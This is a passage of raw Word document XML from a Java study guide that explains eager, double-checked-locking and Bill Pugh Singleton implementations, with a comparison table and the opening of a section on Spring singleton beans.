          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow changes to their state. Immutability is favored in concurrent or multi-threaded environments for simplicity and thread safety, whereas mutability is used when the object's state needs to be flexible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5330DC" w14:textId="2629B777" w:rsidR="00342FA5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A37CF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F713C79">
          <v:rect id="_x0000_i1226" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8410B9" w14:textId="1DFEC70F" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="0039480A" w:rsidP="00A37CF1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc196307561"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Custom implementation of Singleton beans</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p w14:paraId="00B1D159" w14:textId="60B37F4A" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00826529">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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ustom Implementation of Singleton Beans in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B8F622"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the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Singleton pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensures that a class has only one instance and provides a global point of access to that instance. This is useful for resources like database connections or configurations where having more than one instance would be wasteful or inefficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C7560A"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implementing Singleton beans in Java (e.g., for dependency injection in Spring or for general Java classes), we typically follow certain design patterns and principles to ensure proper thread safety, lazy initialization, and proper handling of the instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043C7ADA" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80"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ustom Implementation of Singleton Pattern in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F41C009"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ere’s a custom implementation of a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Singleton pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3870CDA5" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80"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Eager Initialization Singleton:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8E0B81"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approach, the singleton instance is created at the time of class loading, which ensures that the instance is created even before it is accessed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165C4888"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ingleton {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5735C3"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Eagerly initialize the instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B6680F"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atic final Singleton instance = new Singleton();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C2E8C9" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D6918A0"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vate constructor to prevent instantiation from other classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E26F0C"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ingleton() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CADD54"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Initialization logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51999B4F"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ingleton instance created!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE7FD98"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AF8662B" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66745111"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ublic method to provide access to the instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1756E407"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Singleton getInstance() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7694C4"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instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F361433"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8B198B5" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="403C29BA"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Example method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F199378"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showMessage() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733B46B2"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Hello from Singleton!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44140E47"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0749E1F"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4E2ED6B" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30BAF9C3"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TestSingleton {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100C8A28"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4C1CCB9D"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ccessing Singleton instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BC30E3"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ingleton singleton = Singleton.getInstance();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AC28B0"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ingleton.showMessage();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA1D8EE"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80BF901"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E5C6D55"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planation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADB4B24" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50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instance is created at the time the class is loaded (instance is created as a static final variable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DE8841" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50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etInstance() provides the global access to the singleton instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691E2045" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50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approach is simple and thread-safe, but the instance is created even if it's not used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C8DE3E" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80"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Lazy Initialization Singleton (Thread-Safe):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C02CEF0"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lazy initialization, the singleton instance is created only when it is first needed. However, we need to ensure thread-safety to prevent multiple threads from creating the instance simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C97B91"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public class Singleton {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66965439"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Volatile variable to ensure visibility across threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3029F3C9"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atic volatile Singleton instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547A4122" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71218A64"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vate constructor to prevent instantiation from other classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC724C0"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ingleton() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D9AE7F"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Initialization logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42080252"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ingleton instance created!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484DE8DE"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FEB67C2" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34F878E2"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Double-Checked Locking for thread-safety and lazy initialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B42563C"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Singleton getInstance() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF3175B"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instance == null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD3FCE9"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nchronized (Singleton.class) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119A646B"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instance == null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0B1451"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stance = new Singleton();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23175127"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0910408"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6548FF4"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52376CE"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instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C919DA5"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959907F" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C090B8A"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Example method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120C77D7"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showMessage() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035E2A42"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Hello from Singleton!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E87CD77"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AE21D81"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F92BE72" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BA0FA6D"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TestSingleton {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B3E75E"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55BFA45D"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ccessing Singleton instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34116BDD"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ingleton singleton = Singleton.getInstance();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B63BC3A"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ingleton.showMessage();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C38C6B9"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92C9641"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E8CF66F"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planation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D6CA5A" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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olatile keyword</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensures that the instance is properly visible to all threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1DCA37" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ouble-checked locking is used to make sure that the instance is created only once, and subsequent accesses are faster without synchronization overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E392EC" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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approach is efficient because it defers the instantiation until the first time getInstance() is called, and it ensures thread-safety.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558833A3" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80"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Bill Pugh Singleton (Singleton with Static Inner Class):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6531CE20"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is approach takes advantage of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java's class loading mechanism</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and ensures thread-safety while still being lazy-loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BDA0A1"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ingleton {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC815C1"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vate constructor to prevent instantiation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F78214"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ingleton() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67460192"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Initialization logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B722BF"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ingleton instance created!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BCB1A9"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8F863AF" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C14E866"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tatic inner class responsible for holding the singleton instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192450E5"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atic class SingletonHelper {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214031BE"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This is the instance that gets created only when the class is loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C1039E"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atic final Singleton INSTANCE = new Singleton();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B483B7"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92DC99E" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C9C667A"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ublic method to provide access to the instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67141303"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Singleton getInstance() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082A38E1"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SingletonHelper.INSTANCE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D4BA99"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A075587" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4668DCA2"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Example method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE4FC5B"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showMessage() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB2102A"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Hello from Singleton!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202304AF"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A7776DA"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4177BC3" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23F3B757"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TestSingleton {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CD53BB"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7B11FF94"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ccessing Singleton instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C86B803"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ingleton singleton = Singleton.getInstance();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574E56FB"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ingleton.showMessage();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736BB9D1"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6C47094"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91F95BD"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planation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC04170" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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instance is created when the SingletonHelper class is loaded for the first time, and this happens only when the getInstance() method is called.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699B2DFE" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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azy initialization</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thread safety</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are handled automatically by the JVM, ensuring that the instance is created only once and in a thread-safe manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01404DFB" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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method is preferred for implementing singletons in modern Java applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFC4E75" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80"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paring Different Singleton Implement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0"/>
        <w:gridCol w:w="8174"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A37CF1" w:rsidRPr="00CE4B95" w14:paraId="6DBEFD10" w14:textId="77777777" w:rsidTr="00262B80">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C5AA1CA" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80"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Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BFDAC12" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80"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A37CF1" w:rsidRPr="00CE4B95" w14:paraId="3B66BEC0" w14:textId="77777777" w:rsidTr="00262B80">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52FF3670"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ager Initialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23D8489F"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instance is created at the time of class loading. Simple but does not optimize for performance as the instance is always created even if it’s not used.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A37CF1" w:rsidRPr="00CE4B95" w14:paraId="2E1229C4" w14:textId="77777777" w:rsidTr="00262B80">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FB08E0F"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azy Initialization (Thread-Safe)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6346CC22"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instance is created only when needed, but thread-safety is managed with synchronization.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A37CF1" w:rsidRPr="00CE4B95" w14:paraId="13B4152E" w14:textId="77777777" w:rsidTr="00262B80">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09D90FE2"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ill Pugh Singleton</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6743161C"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is is the preferred way of implementing Singleton because it is both </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>thread-safe</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lazy-loaded</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> without needing synchronization. It uses the </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Static Inner Class</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> mechanism.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E9D337D" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80"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to Use Singleton Beans in a Spring Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCD41EF"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Spring, beans can be singleton by default. When you define a bean in the Spring context, Spring creates only one instance of that bean and uses it for all requests. This is done automatically unless you specify a different scope (e.g., @Scope("prototype")).</w:t>
      </w:r>
